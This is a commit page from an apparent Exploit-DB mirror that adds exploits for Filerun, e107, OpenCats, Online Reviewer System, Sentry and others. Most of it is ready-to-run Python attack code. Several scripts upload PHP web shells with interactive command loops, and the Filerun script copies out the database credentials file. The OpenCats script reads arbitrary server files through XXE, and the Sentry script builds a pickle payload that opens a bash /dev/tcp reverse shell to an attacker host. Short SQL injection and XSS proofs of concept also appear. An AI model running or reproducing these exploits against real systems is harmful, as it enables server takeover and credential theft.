bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-09-23

Browse source 
8 changes to exploits/shellcodes

TotalAV 5.15.69 - Unquoted Service Path
Simple Attendance System 1.0 - Unauthenticated Blind SQLi
Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)
e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)
OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)
Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)
Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated)
Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
This commit is contained in:
Offensive Security 2021-09-23 05:02:08 +00:00
parent 1148d69c62
commit f449a4864b
9 changed files with 757 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
exploits/multiple/webapps/50317.txt Normal file
View file

@ -0,0 +1,14 @@
# Exploit Title: Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)
# Date: 10.06.2021
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://cloudron.io
# Software Link: https://www.cloudron.io/get.html
# Version: 6.3 >
# CVE : CVE-2021-40868
Proof of Concept:
1. Go to https://localhost/login.html?returnTo=
2. Type your payload after returnTo=
3. Fill in the login information and press the sign in button.

28
exploits/php/webapps/50312.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Simple Attendance System 1.0 - Unauthenticated Blind SQLi
# Exploit Author: ()t/\/\1
# Date: September 21, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
# Tested on: Linux
# Version: v1.0
# Exploit Description:
The application suffers from an unauthenticated SQL Injection vulnerability.Input passed through 'employee_code' POST parameter in 'http://127.0.0.1//attendance/Actions.php?a=save_attendance' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data.
# PoC request
POST /attendance/Actions.php?a=save_attendance HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/attendance/attendance.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 138
Connection: close
Cookie: PHPSESSID=11c4e96bb334b51540f4758e9d33885d
employee_code=2d'+OR+SUBSTR((select+user_id+from+user_list+where+username="admin"),1,1)="1"--&att_type_id=1&date_created=&att_type=Time+In

76
exploits/php/webapps/50313.py Executable file
View file

@ -0,0 +1,76 @@
# Exploit Title: Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)
# Date: 09/21/2021
# Exploit Author: syntegris information solutions GmbH
# Credits: Christian P.
# Vendor Homepage: https://filerun.com
# Software Link: https://f.afian.se/wl/?id=SkPwYC8dOcMIDWohmyjOqAgdqhRqCZ3X&fmode=download&recipient=d3d3LmZpbGVydW4uY29t
# Version: 2021.03.26
# Tested on: official docker image
# PoC for exploiting a chain of a stored XSS and authenticated Remote Code Execution
import requests
import time
import sys
# this is the plain version of the payload below
"""
var xmlhttp = new XMLHttpRequest();
var url = '/?module=cpanel&section=settings&page=image_preview&action=checkImageMagick'
var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>' > shell.php #";
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == XMLHttpRequest.DONE) {
if (xmlhttp.status == 200) {
console.log(xmlhttp.responseText);
}
}
};
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("mode=exec&path=convert|"+payload);
"""
if not len(sys.argv) == 2:
print("missing target url")
sys.exit(1)
target = sys.argv[1]
def inject_code():
payload = "&#x76;&#x61;&#x72;&#x20;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x20;&#x3d;&#x20;&#x6e;&#x65;&#x77;&#x20;&#x58;&#x4d;&#x4c;&#x48;&#x74;&#x74;&#x70;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x28;&#x29;&#x3b;&#x0a;&#x76;&#x61;&#x72;&#x20;&#x75;&#x72;&#x6c;&#x20;&#x3d;&#x20;&#x27;&#x2f;&#x3f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x3d;&#x63;&#x70;&#x61;&#x6e;&#x65;&#x6c;&&#x73;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x73;&#x65;&#x74;&#x74;&#x69;&#x6e;&#x67;&#x73;&&#x70;&#x61;&#x67;&#x65;&#x3d;&#x69;&#x6d;&#x61;&#x67;&#x65;&#x5f;&#x70;&#x72;&#x65;&#x76;&#x69;&#x65;&#x77;&&#x61;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x63;&#x68;&#x65;&#x63;&#x6b;&#x49;&#x6d;&#x61;&#x67;&#x65;&#x4d;&#x61;&#x67;&#x69;&#x63;&#x6b;&#x27;&#x0a;&#x76;&#x61;&#x72;&#x20;&#x70;&#x61;&#x79;&#x6c;&#x6f;&#x61;&#x64;&#x20;&#x3d;&#x20;"&#x65;&#x63;&#x68;&#x6f;&#x20;&#x27;<&#x3f;&#x70;&#x68;&#x70;&#x20;&#x65;&#x63;&#x68;&#x6f;&#x20;&#x73;&#x68;&#x65;&#x6c;&#x6c;&#x5f;&#x65;&#x78;&#x65;&#x63;&#x28;&#x24;&#x5f;&#x52;&#x45;&#x51;&#x55;&#x45;&#x53;&#x54;&#x5b;&#x5c;&#x27;&#x63;&#x6d;&#x64;&#x5c;&#x27;&#x5d;&#x29;&#x3b;&#x20;&#x3f;>&#x27;&#x20;&#x20;>&#x20;&#x73;&#x68;&#x65;&#x6c;&#x6c;&#x2e;&#x70;&#x68;&#x70;&#x20;&#x23;"&#x3b;&#x0a;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x6f;&#x6e;&#x72;&#x65;&#x61;&#x64;&#x79;&#x73;&#x74;&#x61;&#x74;&#x65;&#x63;&#x68;&#x61;&#x6e;&#x67;&#x65;&#x20;&#x3d;&#x20;&#x66;&#x75;&#x6e;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x28;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x72;&#x65;&#x61;&#x64;&#x79;&#x53;&#x74;&#x61;&#x74;&#x65;&#x20;&#x3d;&#x3d;&#x20;&#x58;&#x4d;&#x4c;&#x48;&#x74;&#x74;&#x70;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x2e;&#x44;&#x4f;&#x4e;&#x45;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x3d;&#x3d;&#x20;&#x32;&#x30;&#x30;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;&#x20;&#x20;&#x63;&#x6f;&#x6e;&#x73;&#x6f;&#x6c;&#x65;&#x2e;&#x6c;&#x6f;&#x67;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x72;&#x65;&#x73;&#x70;&#x6f;&#x6e;&#x73;&#x65;&#x54;&#x65;&#x78;&#x74;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x3d;&#x3d;&#x20;&#x34;&#x30;&#x30;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;&#x20;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x54;&#x68;&#x65;&#x72;&#x65;&#x20;&#x77;&#x61;&#x73;&#x20;&#x61;&#x6e;&#x20;&#x65;&#x72;&#x72;&#x6f;&#x72;&#x20;&#x34;&#x30;&#x30;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;&#x20;&#x20;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x73;&#x6f;&#x6d;&#x65;&#x74;&#x68;&#x69;&#x6e;&#x67;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x6f;&#x74;&#x68;&#x65;&#x72;&#x20;&#x74;&#x68;&#x61;&#x6e;&#x20;&#x32;&#x30;&#x30;&#x20;&#x77;&#x61;&#x73;&#x20;&#x72;&#x65;&#x74;&#x75;&#x72;&#x6e;&#x65;&#x64;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x7d;&#x0a;&#x7d;&#x3b;&#x0a;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x6f;&#x70;&#x65;&#x6e;&#x28;"&#x50;&#x4f;&#x53;&#x54;"&#x2c;&#x20;&#x75;&#x72;&#x6c;&#x2c;&#x20;&#x74;&#x72;&#x75;&#x65;&#x29;&#x3b;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x65;&#x74;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x48;&#x65;&#x61;&#x64;&#x65;&#x72;&#x28;"&#x43;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x2d;&#x54;&#x79;&#x70;&#x65;"&#x2c;&#x20;"&#x61;&#x70;&#x70;&#x6c;&#x69;&#x63;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x2f;&#x78;&#x2d;&#x77;&#x77;&#x77;&#x2d;&#x66;&#x6f;&#x72;&#x6d;&#x2d;&#x75;&#x72;&#x6c;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x65;&#x64;"&#x29;&#x3b;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x65;&#x6e;&#x64;&#x28;"&#x6d;&#x6f;&#x64;&#x65;&#x3d;&#x65;&#x78;&#x65;&#x63;&&#x70;&#x61;&#x74;&#x68;&#x3d;&#x63;&#x6f;&#x6e;&#x76;&#x65;&#x72;&#x74;&#x7c;"&#x2b;&#x70;&#x61;&#x79;&#x6c;&#x6f;&#x61;&#x64;&#x29;&#x3b;&#x0a;"
req = requests.post(
"%s/?module=fileman&page=login&action=login" % target,
data={'username': 'nonexistend', 'password': 'wrong', 'otp':'',
'two_step_secret':'','language':''}, headers={'X-Forwarded-For': '<img src="/asdasdasd" onerror=%s >' % payload}
)
def check_shell_exists():
req = requests.get("%s/shell.php" % target)
if req.status_code != 200:
return False
return True
def process_command(command):
req = requests.get("%s/shell.php?cmd=%s" % (target, command))
print(req.text)
while True:
print("Injecting new log message...")
inject_code()
time.sleep(10)
if check_shell_exists():
print("Shell exists under '%s/shell.php?cmd=ls'" % target)
break
print("Lets get autoconfig.php which contains database credentials...")
process_command("cp system/data/autoconfig.php js/autoconfig.txt")
ac_resp = requests.get("%s/js/autoconfig.txt" % target)
with open("filerun.autoconfig.php", "wb") as ac_f:
ac_f.write(ac_resp.content)
process_command("rm js/autoconfig.php")
while True:
command = input("Command:")
process_command(command)

168
exploits/php/webapps/50315.py Executable file
View file

@ -0,0 +1,168 @@
# Exploit Title: e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 21-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 2.3.0
# Category: Webapps
# Tested on: Linux/Windows
# e107 is a free website content management system
# Includes an endpoint that allows remote access
# Theme page is misconfigured, causing security vulnerability
# User information with sufficient permissions is required.
# The contents of the upload "malicious.zip" file must be too long to read to bypass some security measures!
# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
# python3 exploit.py -h
from time import sleep
import requests
import argparse
def main():
parser = argparse.ArgumentParser(
description='e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)'
)
parser.add_argument('-u', '--host', type=str, required=True)
parser.add_argument('-l', '--login', type=str, required=True)
parser.add_argument('-p', '--password', type=str, required=True)
args = parser.parse_args()
print("\ne107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)",
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
host(args)
def host(args):
#Check http or https
if args.host.startswith(('http://', 'https://')):
print("[?] Check Url...\n")
sleep(2)
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
else:
pass
else:
print("\n[?] Check Adress...\n")
sleep(2)
args.host = "http://" + args.host
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
else:
pass
# Check Host Status
try:
response = requests.get(args.host)
if response.status_code != 200:
print("[-] Address not reachable!")
sleep(2)
exit(1)
else:
check(args)
except requests.ConnectionError as exception:
print("[-] Address not reachable!")
sleep(2)
exit(1)
def check(args):
response = requests.get(args.host + "/e107_themes/payload/payload.php?cmd=whoami")
if response.status_code == 200:
print("[*] Exploit File Exists!\n")
sleep(2)
exploit(args)
else:
login(args)
def login(args):
url = args.host + "/e107_admin/admin.php"
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/e107_admin/admin.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
data = {"authname": args.login, "authpass": args.password, "authsubmit": "Log In"}
response = requests.post(url, headers=headers, data=data, allow_redirects=False)
new_cookie = response.cookies.get("MySi_cookieSID")
if (response.headers.get("Location") == "admin.php?failed"):
print("[-] Login Failed...\n")
print("Your username or password is incorrect.")
sleep(2)
exit(1)
else:
print("[+] Success Login...\n")
sleep(2)
install(args, new_cookie)
def install(args, new_cookie):
url = args.host + "/e107_admin/theme.php"
cookies = {
"MySi_cookieSID": new_cookie,
"e107_tzOffset": "-180"}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/e107_admin/theme.php?mode=main&action=upload",
"Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
data = "------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n2097152\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"ac\"\r\n\r\n005cd2159fa5342883b18a46726a908d\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"file_userfile[]\"; filename=\"payload.zip\"\r\nContent-Type: application/zip\r\n\r\nPK\x03\x04\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00payload/PK\x03\x04\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00\x00\x00payload/payload.php\xb3\xb1/\xc8(P\xc8L\xd3\xc8,.N-\xd1P\x89ww\r\x89VO\xceMQ\x8f\xd5\xd4\xacVP\x01\xb2\x14l\x15P\xc5\xad\x15\x8a+\x8bKRs5@\xb2@^Jf\xaa\xb5B\xad\x82\xbd\x1d\x00PK\x01\x02?\x03\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00$\x00\x00\x00\x00\x00\x00\x00\x10\x80\xedA\x00\x00\x00\x00payload/\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\xaf\x9b\xc4\xe5\xae\xd7\x01\x80E4\xc5\xe5\xae\xd7\x01\x00\xaf\x9b\xc4\xe5\xae\xd7\x01PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81&\x00\x00\x00payload/payload.php\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x80/\x99\xe6\xed\xae\xd7\x01\x008\xa1x\xee\xae\xd7\x01\x80/\x99\xe6\xed\xae\xd7\x01PK\x05\x06\x00\x00\x00\x00\x02\x00\x02\x00\xbf\x00\x00\x00\x95\x00\x00\x00\x00\x00\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\n1\r\n------WebKitFormBoundary--\r\n"
response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
if (response.status_code == 301):
print("[!] Unauthorized user!\n\n")
print("Requires user with add theme permissions.")
sleep(2)
exit(1)
else:
print("[!] Upload Vuln File!\n")
sleep(2)
exploit(args)
def exploit(args):
print("[+] Exploit Done!\n")
sleep(2)
while True:
cmd = input("$ ")
url = args.host + "/e107_themes/payload/payload.php?cmd=" + cmd
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
}
response = requests.post(url, headers=headers, timeout=5)
if response.text == "":
print(cmd + ": command not found\n")
else:
print(response.text)
if __name__ == '__main__':
main()

136
exploits/php/webapps/50316.py Executable file
View file

@ -0,0 +1,136 @@
# Exploit Title: OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)
# Date: 2021-09-20
# Exploit Author: Jake Ruston
# Vendor Homepage: https://opencats.org
# Software Link: https://github.com/opencats/OpenCATS/releases/download/0.9.4-2/opencats-0.9.4-2-full.zip
# Version: < 0.9.4-3
# Tested on: Linux
# CVE: 2019-13358
from argparse import ArgumentParser
from docx import Document
from zipfile import ZipFile
from base64 import b64decode
import requests
import re
xml = """
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE root [<!ENTITY file SYSTEM 'php://filter/convert.base64-encode/resource={}'>]>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
<w:body>
<w:p>
<w:r>
<w:t>START&file;END</w:t>
</w:r>
</w:p>
<w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
<w:pgSz w:w="12240" w:h="15840"/>
<w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
<w:cols w:space="720"/>
<w:docGrid w:linePitch="360"/>
</w:sectPr>
</w:body>
</w:document>
"""
class CVE_2019_13358:
def __init__(self):
self.args = self.parse_arguments()
def parse_arguments(self):
parser = ArgumentParser()
required = parser.add_argument_group("required arguments")
required.add_argument("--url", help="the URL where OpenCATS is hosted", required=True)
required.add_argument("--file", help="the remote file to read", required=True)
args = parser.parse_args()
if not args.url.startswith("http"):
args.url = f"http://{args.url}"
args.url = f"{args.url}/careers/index.php"
return args
def create_resume(self):
document = Document()
document.add_paragraph()
document.save("resume.docx")
def update_resume(self):
with ZipFile("resume.docx", "r") as resume:
resume.extractall()
with open("word/document.xml", "w") as document:
document.write(xml.format(self.args.file).strip())
with ZipFile("resume.docx", "w") as resume:
resume.write("word/document.xml")
def get(self):
params = { "m": "careers", "p": "showAll" }
try:
request = requests.get(self.args.url, params=params)
except:
raise Exception("Failed to GET to the URL provided")
id = re.search(r"ID=([0-9])*", request.text)
if id is None:
raise Exception("No vacancies were found")
return id.group(1)
def post(self, id):
params = { "m": "careers", "p": "onApplyToJobOrder" }
files = {
"ID": (None, id),
"candidateID": (None, -1),
"applyToJobSubAction": (None, "resumeLoad"),
"file": (None, ""),
"resumeFile": open("resume.docx", "rb"),
"resumeContents": (None, ""),
"firstName": (None, ""),
"lastName": (None, ""),
"email": (None, ""),
"emailconfirm": (None, ""),
"phoneHome": (None, ""),
"phoneCell": (None, ""),
"phone": (None, ""),
"bestTimeToCall": (None, ""),
"address": (None, ""),
"city": (None, ""),
"state": (None, ""),
"zip": (None, ""),
"keySkills": (None, "")
}
try:
request = requests.post(self.args.url, params=params, files=files)
except Exception as e:
raise Exception("Failed to POST to the URL provided", e)
start = request.text.find("START")
end = request.text.find("END")
file = request.text[start + 5:end].strip()
try:
file = b64decode(file)
file = file.decode("ascii").strip()
except:
raise Exception("File not found")
print(file)
def run(self):
self.create_resume()
self.update_resume()
id = self.get()
self.post(id)
CVE_2019_13358().run()

120
exploits/php/webapps/50319.py Executable file
View file

@ -0,0 +1,120 @@
# Exploit Title: Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja
# Date: 2021-09-21
# Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/reviewer_0.zip
# Version: 1.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Online Reviewer System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
# RCE via executing exploit:
# Step 1: run the exploit in python with this command: python3 ORS_v1.0.py
# Step 2: Input the URL of the vulnerable application: Example: http://localhost/reviewer/
import requests, sys, urllib, re
import datetime
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
print(Style.BRIGHT+" Online Reviewer System 1.0")
print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)
print(r"""
______ _______ ________
___ //_/__ /_______ ___ _______ ______(_)_____ _
__ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/
_ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ /
/_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/
/___/
abdullahkhawaja.com
""")
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
#Create a new session
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
LINK=input("Enter URL of The Vulnarable Application : ")
def webshell(LINK, session):
try:
WEB_SHELL = LINK+'/system/system/admins/assessments/databank/files/'+filename
getdir = {'cmd': 'echo %CD%'}
r2 = session.get(WEB_SHELL, params=getdir, verify=False)
status = r2.status_code
if status != 200:
print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
r2.raise_for_status()
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
cwd = re.findall('[CDEF].*', r2.text)
cwd = cwd[0]+"> "
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
while True:
thought = input(term)
command = {'cmd': thought}
r2 = requests.get(WEB_SHELL, params=command, verify=False)
status = r2.status_code
if status != 200:
r2.raise_for_status()
response2 = r2.text
print(response2)
except:
print("\r\nExiting.")
sys.exit(-1)
#Creating a PHP Web Shell
phpshell = {
'personImage':
(
'kh4waja.php',
'<?php echo shell_exec($_REQUEST["cmd"]); ?>',
'application/octet-stream',
{'Content-Disposition': 'form-data'}
)
}
# Defining value for form data
data = {'difficulty_id':'1', 'test_desc':'CIVIL ENGINEERING', 'test_desc':'CIVIL ENGINEERING', 'test_subject':'Mathematics, Surveying and Transportation Engineering', 'description':'Hello World', 'option_a':'a', 'option_b':'b', 'option_c':'c', 'option_d':'d', 'answer':'A', 'btnAddQuestion':'Save' }
filename = 'kh4waja.php'
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'system/system/admins/assessments/databank/btn_functions.php?action=add', cookies=cookies, files=phpshell, data=data)
shell_upload = True if("" in upload.text) else False
u=shell_upload
if u:
print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
#Executing The Webshell
webshell(LINK, s)

147
exploits/python/webapps/50318.py Executable file
View file

@ -0,0 +1,147 @@
# Exploit Title: Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 22/09/2021
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vulnerability Discovered By : Clement Berthaux (SYNACKTIV)
# Software Link: https://sentry.io/welcome/
# Advisory: https://doc.lagout.org/Others/synacktiv_advisory_sentry_pickle.pdf
# Tested on: Sentry 8.0.0
# Fixed Versions : 8.1.4 , 8.2.2
# NOTE : Only exploitable by a user with Superuser privileges.
# Example Usage : https://imgur.com/a/4w5rH5s
import requests
import re
import warnings
from bs4 import BeautifulSoup
import sys
import base64
import urllib
import argparse
import os
import time
from cPickle import dumps
import subprocess
from base64 import b64encode
from zlib import compress
from shlex import split
from datetime import datetime
parser = argparse.ArgumentParser(description='Sentry < 8.2.2 Authenticated RCE')
parser.add_argument('-U',help='Sentry Admin Username / Email')
parser.add_argument('-P',help='Sentry Admin Password')
parser.add_argument('-l',help='Rev Shell LHOST')
parser.add_argument('-p',help='Rev Shell LPORT ',type=int)
parser.add_argument('--url',help='Sentry Login URL ')
args = parser.parse_args()
username = args.U
password = args.P
lhost = args.l
lport = args.p
sentry_url = args.url
# Generate Payload
class PickleExploit(object):
def __init__(self, command_line):
self.args = split(command_line)
def __reduce__(self):
return (subprocess.Popen, (self.args,))
rev_shell = '/bin/bash -c "bash -i >& /dev/tcp/%s/%s 0>&1"' %(lhost,lport)
payload = b64encode(compress(dumps(PickleExploit(rev_shell))))
print("\r\n[+] Using Bash Reverse Shell : %s" %(rev_shell))
print("[+] Encoded Payload : %s" %(payload))
# Perform Exploitation
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
request = requests.Session()
print("[+] Retrieving CSRF token to submit the login form")
print("[+] URL : %s" %(sentry_url))
time.sleep(1)
page = request.get(sentry_url)
html_content = page.text
soup = BeautifulSoup(html_content,features="lxml")
token = soup.findAll('input')[0].get("value")
print("[+] CSRF Token : "+token)
time.sleep(1)
#Login
proxies = {
"http" : "http://127.0.0.1:8080",
"https" : "https://127.0.0.1:8080",
}
login_info ={
"csrfmiddlewaretoken": token,
"op": "login",
"username": username,
"password": password
}
login_request = request.post(sentry_url,login_info)
if login_request.status_code==200:
print("[+] Login Successful")
time.sleep(1)
else:
print("Login Failed")
print(" ")
sys.exit()
#get admin page
split_url = sentry_url.split("/")[2:]
main_url = "http://"+split_url[0]
audit_url = main_url+"/admin/sentry/auditlogentry/add/"
#request auditpage
date = datetime.today().strftime('%Y-%m-%d')
time = datetime.today().strftime('%H:%M:%S')
exploit_fields = {
"csrfmiddlewaretoken" : request.cookies['csrf'],
"organization" : "1",
"actor_label" : "root@localhost",
"actor" : "1",
"actor_key" : " ",
"target_object" : "2",
"target_user" : " ",
"event" : "31",
"ip_address" : "127.0.0.1",
"data" : payload,
"datetime_0" : date,
"datetime_1" : time,
"initial-datetime_0" : date,
"initial-datetime_1" : time,
"_save" : "Save"
}
